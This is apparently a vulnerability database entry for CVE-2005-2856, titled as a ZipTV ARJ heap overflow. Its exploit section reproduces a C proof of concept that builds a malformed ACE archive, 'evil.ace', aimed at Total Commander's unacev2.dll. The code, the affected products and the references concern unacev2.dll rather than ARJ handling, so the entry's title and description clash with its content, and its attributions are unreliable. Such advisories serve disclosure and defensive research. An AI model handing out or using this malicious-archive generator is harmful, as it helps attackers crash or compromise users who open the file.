Microchip Data Systems ZipTV TZipTV ARJ File Handling Overflow Vulnerability

Vulnerability ID: 1110008 | Vulnerability type: Buffer overflow
Published: 2006-04-02 | Updated: 2006-09-07
CVE ID: CVE-2005-2856 | CNNVD-ID: CNNVD-200509-086
Platform: Windows | CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/1633
https://www.securityfocus.com/bid/14759
https://cxsecurity.com/issue/WLB-2005100010
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-086
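|Vulnerability Details
ZipTV is a collection of compression/decompression tool components. The TZipTV component of ZipTV contains a heap overflow vulnerability that occurs when it lists the files in an ARJ archive. If a user is tricked into extracting a specially crafted ARJ archive that contains an overly long ARJ header block, the vulnerability is triggered, leading to arbitrary code execution.
|Vulnerability EXP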
/*
--
/\
\/	Total Commander unacev2.dll Buffer Overflow PoC Exploit
/\			by Darkeagle of Unl0ck Research Team
\/					http://unl0ck.net
/\	
\/	when file will be created, try to open archive in TotalCmd and then unpack it ;)
/\
\/
--
*/
#include <string.h>
#include <stdio.h>

unsigned char evil_ace[] = 
	"\x29\x8F\x31\x00\x00\x00\x90\x2A\x2A\x41\x43\x45\x2A\x2A\x14\x14" 
	"\x02\x00\x79\xB5\x7F\x34\xFE\xE2\x05\xA5\x00\x00\x00\x00\x16\x2A" 
	"\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52" 
	"\x53\x49\x4F\x4E\x2A\x7F\x30\x1E\x01\x01\x01\x00\x00\x00\x00\x00" 
	"\x00\x00\x00\x00\x75\xB5\x7F\x34\x20\x00\x00\x00\xFF\xFF\xFF\xFF" 
	"\x00\x03\x0A\x00\x54\x45\xFF\x00\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x2E\x74\x78\x74";


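int main()
{
	/* Write the archive bytes to evil.ace; sizeof-1 drops the literal's trailing NUL. */
	FILE *ace = fopen("evil.ace", "w+b");
	if (ace == NULL) {
		perror("fopen");
		return 1;
	}
	fwrite(evil_ace, 1, sizeof(evil_ace)-1, ace);
	fclose(ace);
	return 0;
}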

// milw0rm.com [2006-04-02]
|Affected Products
WinHKI WinHKI 1.67
WinHKI WinHKI 1.66
Where Is It Soft Where Is It 3.73.501
UltimateZip UltimateZip 3.0.3
UltimateZip UltimateZip 2.7.1
UltimateZip UltimateZip 3.1b
|References

Source: SECUNIA
Name: 16479
Link: http://secunia.com/advisories/16479
Source: BID
Name: 14759
Link: http://www.securityfocus.com/bid/14759
Source: BUGTRAQ
Name: 20060517 Secunia Research: Eazel unacev2.dll Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/434279/100/0/threaded
Source: BUGTRAQ
Name: 20060517 Secunia Research: IZArc unacev2.dll Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/434234/100/0/threaded
Source: BUGTRAQ
Name: 20060515 Secunia Research: FilZip unacev2.dll Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/434011/100/0/threaded
Source: BUGTRAQ
Name: 20060511 Secunia Research: UltimateZip unacev2.dll Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/433693/100/0/threaded
Source: BUGTRAQ
Name: 20060509 Secunia Research: WhereIsIt unacev2.dll Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/433352/100/0/threaded
Source: BUGTRAQ
Name: 20060508 Secunia Research: Anti-Trojan unacev2.dll Buffer Overflow Vulnerability
Link: